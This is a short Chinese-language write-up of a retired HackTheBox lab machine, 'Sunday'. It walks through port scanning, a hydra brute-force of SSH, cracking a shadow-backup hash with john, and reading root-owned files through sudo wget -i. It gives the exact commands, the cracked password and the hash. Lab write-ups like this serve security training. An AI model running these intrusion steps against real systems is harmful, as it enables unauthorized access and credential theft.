本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.76
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.76 -o ./Sunday
也可以使用官方的方法进行快速的扫描
masscan -p1-65535 10.10.10.76 --rate=1000 -e tun0 > ports ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr ' ' ',' | sed 's/,$//') sudo nmap -Pn -sV -sC -p$ports 10.10.10.76
没发现啥详细信息,再更改参数扫描一把
sudo nmap -n -vvv -sS -sV -sC --stylesheet https://raw.githubusercontent.com/snovvcrash/snovvcrash.github.io/master/reports/nmap/nmap-bootstrap.xsl -p79,111,22022,47581,48935 10.10.10.76
根据开放的79端口,确认目标靶机含有用户sunny,又发现有开放ssh端口,直接进行爆破看看
hydra -f -l sunny -P sunnypass.lst -s 22022 10.10.10.76 ssh
密码是根据用户名组合出来的字典
直接ssh登录
sshpass -p 'sunday' ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oStrictHostKeyChecking=no -p 22022 sunny@10.10.10.76
在sunny家目录执行sudo -l发现测试的执行文件,但是不能提权,只好遍历下系统中的文件,发现一个备份文件
发现含有shadow备份文件,且当前用户可以查看/etc/passwd文件,那么可以通过获取hash进行破解密码
破解用户sammy的hash密码 echo 'sammy:x:101:10:sammy:/export/home/sammy:/bin/bash' >sammypasswd echo 'sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::' >sammy_shadow unshadow sammypasswd sammyshadow > sammyhash john sammyhash --wordlist=/usr/share/wordlists/rockyou.txt --format=sha256crypt john sammyhash --show sammy:cooldude!:101:10:sammy:/export/home/sammy:/bin/bash
得到密码之后就可以读取user.txt内容,然后执行sudo -l发现可以通过wget的-i参数读取root权限的文件
至此拿到目标的两个flag.txt